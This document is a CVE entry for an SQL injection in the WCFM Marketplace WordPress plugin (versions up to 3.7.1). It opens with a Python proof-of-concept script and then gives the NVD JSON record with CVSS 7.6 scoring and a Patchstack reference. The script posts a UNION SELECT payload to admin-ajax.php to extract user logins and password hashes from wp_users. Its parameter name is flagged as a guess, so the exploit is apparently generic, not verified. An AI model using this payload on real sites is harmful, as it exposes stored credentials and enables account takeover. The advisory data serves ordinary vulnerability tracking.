CVE-2025-63029

import requests # Target URL (Example) target_url = "https://example.com/wp-admin/admin-ajax.php" # Attacker cookies (High privilege session required) cookies = { "wordpress_logged_in_xxx": "..." } # SQL Injection Payload (Example) # Adjust the parameter 'wcfm_product_id' based on the vulnerable endpoint payload = { "action": "wcfm_ajax_controller", "controller": "wcfm-products", "wcfm_product_id": "1 UNION SELECT 1,2,3,4,concat(user_login,0x7c,user_pass),6 FROM wp_users-- -" } response = requests.post(target_url, data=payload, cookies=cookies) if "admin" in response.text: print("[+] Vulnerability confirmed!") print(response.text) else: print("[-] Exploit failed or not vulnerable.")

{"cve": {"id": "CVE-2025-63029", "sourceIdentifier": "[email protected]", "published": "2026-04-15T17:17:00.613", "lastModified": "2026-04-23T15:34:59.290", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in WC Lovers WCFM Marketplace wc-multivendor-marketplace allows SQL Injection.This issue affects WCFM Marketplace: from n/a through <= 3.7.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:L", "baseScore": 7.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/wc-multivendor-marketplace/vulnerability/wordpress-wcfm-marketplace-plugin-3-7-1-sql-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}